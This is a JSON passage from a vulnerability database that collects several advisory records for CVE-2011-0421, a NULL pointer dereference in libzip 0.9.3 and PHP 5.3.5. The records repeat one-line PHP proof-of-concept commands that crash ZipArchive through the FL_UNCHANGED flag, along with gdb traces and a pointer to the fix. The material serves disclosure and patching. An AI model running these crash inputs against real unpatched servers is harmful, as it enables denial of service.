"2011-03-18T00:00:00", "type": "exploitdb", "title": "libzip 0.9.3 _zip_name_locate NULL Pointer Dereference incl PHP 5.3.5", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0421"], "modified": "2011-03-18T00:00:00", "id": "EDB-ID:17004", "href": "https://www.exploit-db.com/exploits/17004/", "sourceData": "Source: http://securityreason.com/securityalert/8146\r\n\r\nlibzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\nDate:\r\n- Dis.: 03.01.2011\r\n- Pub.: 18.03.2011\r\n\r\nCVE: CVE-2011-0421\r\nCERT: VU#325039\r\n\r\nAffected Software:\r\n- libzip 0.9.3\r\n- PHP 5.3.5 (fixed 5.3.6)\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/96\r\n\r\n\r\n--- 0.Description ---\r\nlibzip is a C library for reading, creating, and modifying zip archives.\r\nFiles can be added from data buffers, files, or compressed data copied\r\ndirectly from other zip archives. Changes made without closing the archive\r\ncan be reverted. The API is documented by man pages.\r\n\r\n\r\n--- 1.Description ---\r\nlibzip allows remote and local attackers to Denial of Service (Null Pointer\r\nDereference) if ZIP_FL_UNCHANGED flag is set.\r\n\r\n-lib/zip_name_locate.c---\r\nint\r\n_zip_name_locate(struct zip *za, const char *fname, int flags,\r\nstruct zip_error *error)\r\n{\r\nint (*cmp)(const char *, const char *);\r\nconst char *fn, *p;\r\nint i, n;\r\n\r\nif (fname == NULL) {\r\n_zip_error_set(error, ZIP_ER_INVAL, 0);\r\nreturn -1;\r\n}\r\n\r\ncmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;\r\n\r\nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=\r\nCRASH HERE\r\n-lib/zip_name_locate.c---\r\n\r\nfor empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash.\r\nCurrently for PHP, the security impact we estimate only like a remote DoS,\r\nso risk is low. \r\n\r\nProject using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame,\r\nfuse-zip, php zip extension, Endeavour2, FreeDink\r\n\r\nBetter analysis based on PHP code ZipArchive, bellow\r\n\r\n\r\n--- 2. PHP 5.3.5 ZipArchive() ---\r\nPoC1:\r\nphp -r '$nx=new\r\nZipArchive();$nx->open(\"/dev/null\");$nx->locateName(\"a\",ZIPARCHIVE::FL_UNCH\r\nANGED);'\r\n\r\nPoC2:\r\nphp -r '$nx=new\r\nZipArchive();$nx->open(\"empty.zip\");$nx->statName(\"a\",ZIPARCHIVE::FL_UNCHAN\r\nGED);'\r\n\r\nLet's\r\n-php_zip.c-------------------------------------\r\n...\r\nstatic ZIPARCHIVE_METHOD(locateName)\r\n{\r\n...\r\nZIP_FROM_OBJECT(intern, this);\r\n\r\nif (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, \"s|l\",\r\n&name, &name_len, &flags) == FAILURE) {\r\nreturn;\r\n}\r\n...\r\nidx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH\r\nIN THIS FUNCTION\r\n...\r\n-php_zip.c-------------------------------------\r\n\r\nand let`s see\r\n\r\n-zip_name_locate.c-------------------------------------\r\nZIP_EXTERN(int)\r\nzip_name_locate(struct zip *za, const char *fname, int flags)\r\n{\r\nreturn _zip_name_locate(za, fname, flags, &za->error);\r\n}\r\n\r\n\r\nint\r\n_zip_name_locate(struct zip *za, const char *fname, int flags,\r\nstruct zip_error *error)\r\n{\r\nint (*cmp)(const char *, const char *);\r\nconst char *fn, *p;\r\nint i, n;\r\n\r\nif (fname == NULL) {\r\n_zip_error_set(error, ZIP_ER_INVAL, 0);\r\nreturn -1;\r\n}\r\n\r\ncmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;\r\n\r\nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <===\r\nCRASH HERE IF ZIPARCHIVE::FL_UNCHANGED\r\nfor (i=0; i<n; i++) {\r\n...\r\n-zip_name_locate.c-------------------------------------\r\n\r\n(gdb) bt\r\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70\r\n\"a\", flags=32767, \r\nerror=0xffffffff00000000) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2,\r\nreturn_value=0x1169418, return_value_ptr=0xffffffff, \r\nthis_ptr=0x118d530, return_value_used=-176126592) at\r\n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877\r\n#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC\r\n(execute_data=0x7ffff7eb7068)\r\nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\r\n#3 0x00000000006c0b00 in execute (op_array=0x1168568) at\r\n/build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107\r\n...\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400\r\n\"9223372036854775808\", flags=32767, \r\nerror=0xffffffff00000000) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry :\r\nza->nentry;\r\n(gdb) print za->cdir->nentry\r\nCannot access memory at address 0x8\r\n(gdb) print za->nentry\r\n$21 = 0\r\n\r\nbecause \r\n\r\n(gdb) x/i $rip\r\n=> 0x6407cc <_zip_name_locate+236>: mov 0x8(%rax),%eax\r\n(gdb) x/i $rax\r\n0x0: Cannot access memory at address 0x0\r\n(gdb) x/i $eax\r\n\r\ncall to zip_name_locate\r\n\r\n(gdb) n\r\n1877 idx = (long)zip_name_locate(intern, (const char *)name,\r\nflags);\r\n(gdb) print intern\r\n$24 = (struct zip *) 0x118d580\r\n(gdb) x/x intern\r\n0x118d580: 0x0118d220\r\n(gdb) x/40x intern\r\n0x118d580: 0x0118d220 0x00000000 0x0118d340 0x00000000\r\n0x118d590: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5a0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5b0: 0x00000000 0x00000000 0xffffffff 0x00000000\r\n0x118d5c0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5d0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5e0: 0x00000000 0x00000000 0x00020a21 0x00000000\r\n0x118d5f0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d600: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d610: 0x00000000 0x00000000 0x00000000 0x00000000\r\n\r\n\r\nnext PoC2\r\n\r\n$nx=new\r\nZipArchive();$nx->open(\"empty.zip\");$nx->statName(\"9223372036854775808\",\"92\r\n23372036854775807\");\r\nrogram received signal SIGSEGV, Segmentation fault.\r\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0\r\n\"9223372036854775808\", flags=32767, \r\nerror=0xffffffffffffdac0) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n65 in /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c\r\n(gdb) bt\r\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0\r\n\"9223372036854775808\", flags=32767, \r\nerror=0xffffffffffffdac0) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n#1 0x0000000000640a50 in zip_stat (za=0x118d520, fname=0x11693f0\r\n\"9223372036854775808\", flags=-1, \r\nst=0x7fffffffda70) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_stat.c:45\r\n#2 0x0000000000638451 in c_ziparchive_statName (ht=2,\r\nreturn_value=0x1169480, return_value_ptr=0xffffffff, \r\nthis_ptr=0x118d530, return_value_used=-176126592) at\r\n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1818\r\n#3 0x00000000006e986a in zend_do_fcall_common_helper_SPEC\r\n(execute_data=0x7ffff7eb7068)\r\nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\r\n\r\n\r\n--- 3. Fix ---\r\nThis issue has been fixed with PHP Team, so big thanks guys.\r\n\r\nhttp://www.php.net/ChangeLog-5.php#5.3.6\r\n\r\nhttp://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_name\r\n_locate.c?annotate=307867\r\n\r\n\r\n--- 4. Greets ---\r\nSpecial thanks for Pierre Joye and Stas\r\n\r\nsp3x, Infospec,\r\n\r\n\r\n--- 5. Contact ---\r\nAuthor: Maksymilian Arciemowicz\r\n\r\nEmail:\r\n- cxib {a\\./t] securityreason [d=t} com\r\n\r\nGPG:\r\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17004/"}], "freebsd": [{"lastseen": "2019-05-29T18:34:00", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421"], "description": "\nUS-CERT/NIST reports:\n\nThe _zip_name_locate function in zip_name_locate.c in the Zip extension\n\t in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED\n\t argument, which might allow context-dependent attackers to cause a\n\t denial of service (application crash) via an empty ZIP archive that is\n\t processed with a (1) locateName or (2) statName operation.\n\n", "edition": 4, "modified": "2011-03-20T00:00:00", "published": "2011-03-20T00:00:00", "id": "FE853666-56CE-11E0-9668-001FD0D616CF", "href": "https://vuxml.freebsd.org/freebsd/fe853666-56ce-11e0-9668-001fd0d616cf.html", "title": "php -- ZipArchive segfault with FL_UNCHANGED on empty archive", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:06:54", "description": "CVE ID: CVE-2011-0421\r\n\r\nlibzip\u662f\u8bfb\u53d6\u3001\u521b\u5efa\u548c\u4fee\u6539zip\u6587\u6863\u7684\u5e93\u3002\r\n\r\nlibzip 0.9.3 _zip_name_locate\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u7a7a\u6307\u9488\u5f15\u7528\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\n\u8bbe\u7f6eZIP_FL_UNCHANGED\u6807\u7b7e\u540e\uff0clibzip\u53ef\u4f7f\u8fdc\u7a0b\u548c\u672c\u5730\u653b\u51fb\u8005\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\u5bf9\u4e8e\u7a7azip\u6587\u4ef6\u548cZIP_FL_UNCHANGED\u65d7\u6807\uff0clibzip\u4f1a\u53d1\u751f\u5d29\u6e83\u3002\u76ee\u524d\u5bf9\u4e8ePHP\uff0c\u5b89\u5168\u5f71\u54cd\u53ea\u662f\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u3002\n\nPHP PHP 5.3.5\r\nlibzip libzip 0.9.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nlibzip\r\n------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c", "published": "2011-03-22T00:00:00", "type": "seebug", "title": "libzip 0.9.3 _zip_name_locate\u7a7a\u6307\u9488\u5f15\u7528(incl PHP 5.3.5)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0421"], "modified": "2011-03-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20382", "id": "SSV:20382", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T14:21:01", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0421"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71487", "id": "SSV:71487", "sourceData": "\n Source: http://securityreason.com/securityalert/8146\r\n\r\nlibzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\nDate:\r\n- Dis.: 03.01.2011\r\n- Pub.: 18.03.2011\r\n\r\nCVE: CVE-2011-0421\r\nCERT: VU#325039\r\n\r\nAffected Software:\r\n- libzip 0.9.3\r\n- PHP 5.3.5 (fixed 5.3.6)\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/96\r\n\r\n\r\n--- 0.Description ---\r\nlibzip is a C library for reading, creating, and modifying zip archives.\r\nFiles can be added from data buffers, files, or compressed data copied\r\ndirectly from other zip archives. Changes made without closing the archive\r\ncan be reverted. The API is documented by man pages.\r\n\r\n\r\n--- 1.Description ---\r\nlibzip allows remote and local attackers to Denial of Service (Null Pointer\r\nDereference) if ZIP_FL_UNCHANGED flag is set.\r\n\r\n-lib/zip_name_locate.c---\r\nint\r\n_zip_name_locate(struct zip *za, const char *fname, int flags,\r\nstruct zip_error *error)\r\n{\r\nint (*cmp)(const char *, const char *);\r\nconst char *fn, *p;\r\nint i, n;\r\n\r\nif (fname == NULL) {\r\n_zip_error_set(error, ZIP_ER_INVAL, 0);\r\nreturn -1;\r\n}\r\n\r\ncmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;\r\n\r\nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=\r\nCRASH HERE\r\n-lib/zip_name_locate.c---\r\n\r\nfor empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash.\r\nCurrently for PHP, the security impact we estimate only like a remote DoS,\r\nso risk is low. \r\n\r\nProject using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame,\r\nfuse-zip, php zip extension, Endeavour2, FreeDink\r\n\r\nBetter analysis based on PHP code ZipArchive, bellow\r\n\r\n\r\n--- 2. PHP 5.3.5 ZipArchive() ---\r\nPoC1:\r\nphp -r '$nx=new\r\nZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCH\r\nANGED);'\r\n\r\nPoC2:\r\nphp -r '$nx=new\r\nZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHAN\r\nGED);'\r\n\r\nLet's\r\n-php_zip.c-------------------------------------\r\n...\r\nstatic ZIPARCHIVE_METHOD(locateName)\r\n{\r\n...\r\nZIP_FROM_OBJECT(intern, this);\r\n\r\nif (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l",\r\n&name, &name_len, &flags) == FAILURE) {\r\nreturn;\r\n}\r\n...\r\nidx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH\r\nIN THIS FUNCTION\r\n...\r\n-php_zip.c-------------------------------------\r\n\r\nand let`s see\r\n\r\n-zip_name_locate.c-------------------------------------\r\nZIP_EXTERN(int)\r\nzip_name_locate(struct zip *za, const char *fname, int flags)\r\n{\r\nreturn _zip_name_locate(za, fname, flags, &za->error);\r\n}\r\n\r\n\r\nint\r\n_zip_name_locate(struct zip *za, const char *fname, int flags,\r\nstruct zip_error *error)\r\n{\r\nint (*cmp)(const char *, const char *);\r\nconst char *fn, *p;\r\nint i, n;\r\n\r\nif (fname == NULL) {\r\n_zip_error_set(error, ZIP_ER_INVAL, 0);\r\nreturn -1;\r\n}\r\n\r\ncmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;\r\n\r\nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <===\r\nCRASH HERE IF ZIPARCHIVE::FL_UNCHANGED\r\nfor (i=0; i<n; i++) {\r\n...\r\n-zip_name_locate.c-------------------------------------\r\n\r\n(gdb) bt\r\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70\r\n"a", flags=32767, \r\nerror=0xffffffff00000000) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2,\r\nreturn_value=0x1169418, return_value_ptr=0xffffffff, \r\nthis_ptr=0x118d530, return_value_used=-176126592) at\r\n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877\r\n#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC\r\n(execute_data=0x7ffff7eb7068)\r\nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\r\n#3 0x00000000006c0b00 in execute (op_array=0x1168568) at\r\n/build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107\r\n...\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400\r\n"9223372036854775808", flags=32767, \r\nerror=0xffffffff00000000) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry :\r\nza->nentry;\r\n(gdb) print za->cdir->nentry\r\nCannot access memory at address 0x8\r\n(gdb) print za->nentry\r\n$21 = 0\r\n\r\nbecause \r\n\r\n(gdb) x/i $rip\r\n=> 0x6407cc <_zip_name_locate+236>: mov 0x8(%rax),%eax\r\n(gdb) x/i $rax\r\n0x0: Cannot access memory at address 0x0\r\n(gdb) x/i $eax\r\n\r\ncall to zip_name_locate\r\n\r\n(gdb) n\r\n1877 idx = (long)zip_name_locate(intern, (const char *)name,\r\nflags);\r\n(gdb) print intern\r\n$24 = (struct zip *) 0x118d580\r\n(gdb) x/x intern\r\n0x118d580: 0x0118d220\r\n(gdb) x/40x intern\r\n0x118d580: 0x0118d220 0x00000000 0x0118d340 0x00000000\r\n0x118d590: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5a0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5b0: 0x00000000 0x00000000 0xffffffff 0x00000000\r\n0x118d5c0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5d0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5e0: 0x00000000 0x00000000 0x00020a21 0x00000000\r\n0x118d5f0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d600: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d610: 0x00000000 0x00000000 0x00000000 0x00000000\r\n\r\n\r\nnext PoC2\r\n\r\n$nx=new\r\nZipArchive();$nx->open("empty.zip");$nx->statName("9223372036854775808","92\r\n23372036854775807");\r\nrogram received signal SIGSEGV, Segmentation fault.\r\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0\r\n"9223372036854775808", flags=32767, \r\nerror=0xffffffffffffdac0) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n65 in /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c\r\n(gdb) bt\r\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0\r\n"9223372036854775808", flags=32767, \r\nerror=0xffffffffffffdac0) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n#1 0x0000000000640a50 in zip_stat (za=0x118d520, fname=0x11693f0\r\n"9223372036854775808", flags=-1, \r\nst=0x7fffffffda70) at\r\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_stat.c:45\r\n#2 0x0000000000638451 in c_ziparchive_statName (ht=2,\r\nreturn_value=0x1169480, return_value_ptr=0xffffffff, \r\nthis_ptr=0x118d530, return_value_used=-176126592) at\r\n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1818\r\n#3 0x00000000006e986a in zend_do_fcall_common_helper_SPEC\r\n(execute_data=0x7ffff7eb7068)\r\nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\r\n\r\n\r\n--- 3. Fix ---\r\nThis issue has been fixed with PHP Team, so big thanks guys.\r\n\r\nhttp://www.php.net/ChangeLog-5.php#5.3.6\r\n\r\nhttp://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_name\r\n_locate.c?annotate=307867\r\n\r\n\r\n--- 4. Greets ---\r\nSpecial thanks for Pierre Joye and Stas\r\n\r\nsp3x, Infospec,\r\n\r\n\r\n--- 5. Contact ---\r\nAuthor: Maksymilian Arciemowicz\r\n\r\nEmail:\r\n- cxib {a\\./t] securityreason [d=t} com\r\n\r\nGPG:\r\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\n\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71487"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421"], "description": "NULL pointer dereference in _zip_name_locate.", "edition": 1, "modified": "2011-03-21T00:00:00", "published": "2011-03-21T00:00:00", "id": "SECURITYVULNS:VULN:11512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11512", "title": "libzip library / PHP DoS", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421"], "description": "[ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\nDate:\r\n- Dis.: 03.01.2011\r\n- Pub.: 18.03.2011\r\n\r\nCVE: CVE-2011-0421\r\nCERT: VU#325039\r\n\r\nAffected Software:\r\n- libzip 0.9.3\r\n- PHP 5.3.5 (fixed 5.3.6)\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/96\r\n\r\n\r\n--- 0.Description ---\r\nlibzip is a C library for reading, creating, and modifying zip archives. Files can be added from data buffers, files, or compressed data copied directly from other\r\nzip archives. Changes made without closing the archive can be reverted. The API is documented by man pages.\r\n\r\n\r\n--- 1.Description ---\r\nlibzip allows remote and local attackers to Denial of Service (Null Pointer Dereference) if ZIP_FL_UNCHANGED flag is set.\r\n\r\n-lib/zip_name_locate.c---\r\nint\r\n_zip_name_locate(struct zip *za, const char *fname, int flags,\r\n struct zip_error *error)\r\n{\r\n int (*cmp)(const char *, const char *);\r\n const char *fn, *p;\r\n int i, n;\r\n\r\n if (fname == NULL) {\r\n _zip_error_set(error, ZIP_ER_INVAL, 0);\r\n return -1;\r\n }\r\n \r\n cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;\r\n\r\n n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <= CRASH HERE\r\n-lib/zip_name_locate.c---\r\n\r\nfor empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash. Currently for PHP, the security impact we estimate only like a remote DoS, so risk is low. \r\n\r\nProject using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink\r\n\r\nBetter analysis based on PHP code ZipArchive, bellow\r\n\r\n\r\n--- 2. PHP 5.3.5 ZipArchive() ---\r\nPoC1:\r\nphp -r '$nx=new ZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCHANGED);'\r\n\r\nPoC2:\r\nphp -r '$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);'\r\n\r\nLet's\r\n-php_zip.c-------------------------------------\r\n..\r\nstatic ZIPARCHIVE_METHOD(locateName)\r\n{\r\n..\r\n ZIP_FROM_OBJECT(intern, this);\r\n\r\n if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l",\r\n &name, &name_len, &flags) == FAILURE) {\r\n return;\r\n }\r\n..\r\n idx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH IN THIS FUNCTION\r\n..\r\n-php_zip.c-------------------------------------\r\n\r\nand let`s see\r\n\r\n-zip_name_locate.c-------------------------------------\r\nZIP_EXTERN(int)\r\nzip_name_locate(struct zip *za, const char *fname, int flags)\r\n{\r\n return _zip_name_locate(za, fname, flags, &za->error);\r\n}\r\n\r\n\r\nint\r\n_zip_name_locate(struct zip *za, const char *fname, int flags,\r\n struct zip_error *error)\r\n{\r\n int (*cmp)(const char *, const char *);\r\n const char *fn, *p;\r\n int i, n;\r\n\r\n if (fname == NULL) {\r\n _zip_error_set(error, ZIP_ER_INVAL, 0);\r\n return -1;\r\n }\r\n\r\n cmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;\r\n\r\n n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED\r\n for (i=0; i<n; i++) {\r\n..\r\n-zip_name_locate.c-------------------------------------\r\n\r\n(gdb) bt\r\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70 "a", flags=32767, \r\n error=0xffffffff00000000) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2, return_value=0x1169418, return_value_ptr=0xffffffff, \r\n this_ptr=0x118d530, return_value_used=-176126592) at /build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877\r\n#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7eb7068)\r\n at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\r\n#3 0x00000000006c0b00 in execute (op_array=0x1168568) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107\r\n..\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400 "9223372036854775808", flags=32767, \r\n error=0xffffffff00000000) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;\r\n(gdb) print za->cdir->nentry\r\nCannot access memory at address 0x8\r\n(gdb) print za->nentry\r\n$21 = 0\r\n\r\nbecause \r\n\r\n(gdb) x/i $rip\r\n=> 0x6407cc <_zip_name_locate+236>: mov 0x8(%rax),%eax\r\n(gdb) x/i $rax\r\n 0x0: Cannot access memory at address 0x0\r\n(gdb) x/i $eax\r\n\r\ncall to zip_name_locate\r\n\r\n(gdb) n\r\n1877 idx = (long)zip_name_locate(intern, (const char *)name, flags);\r\n(gdb) print intern\r\n$24 = (struct zip *) 0x118d580\r\n(gdb) x/x intern\r\n0x118d580: 0x0118d220\r\n(gdb) x/40x intern\r\n0x118d580: 0x0118d220 0x00000000 0x0118d340 0x00000000\r\n0x118d590: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5a0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5b0: 0x00000000 0x00000000 0xffffffff 0x00000000\r\n0x118d5c0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5d0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d5e0: 0x00000000 0x00000000 0x00020a21 0x00000000\r\n0x118d5f0: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d600: 0x00000000 0x00000000 0x00000000 0x00000000\r\n0x118d610: 0x00000000 0x00000000 0x00000000 0x00000000\r\n\r\n\r\nnext PoC2\r\n\r\n$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("9223372036854775808","9223372036854775807");\r\nrogram received signal SIGSEGV, Segmentation fault.\r\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0 "9223372036854775808", flags=32767, \r\n error=0xffffffffffffdac0) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n65 in /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c\r\n(gdb) bt\r\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0 "9223372036854775808", flags=32767, \r\n error=0xffffffffffffdac0) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\r\n#1 0x0000000000640a50 in zip_stat (za=0x118d520, fname=0x11693f0 "9223372036854775808", flags=-1, \r\n st=0x7fffffffda70) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_stat.c:45\r\n#2 0x0000000000638451 in c_ziparchive_statName (ht=2, return_value=0x1169480, return_value_ptr=0xffffffff, \r\n this_ptr=0x118d530, return_value_used=-176126592) at /build/buildd/php5-5.3.3/ext/zip/php_zip.c:1818\r\n#3 0x00000000006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7eb7068)\r\n at 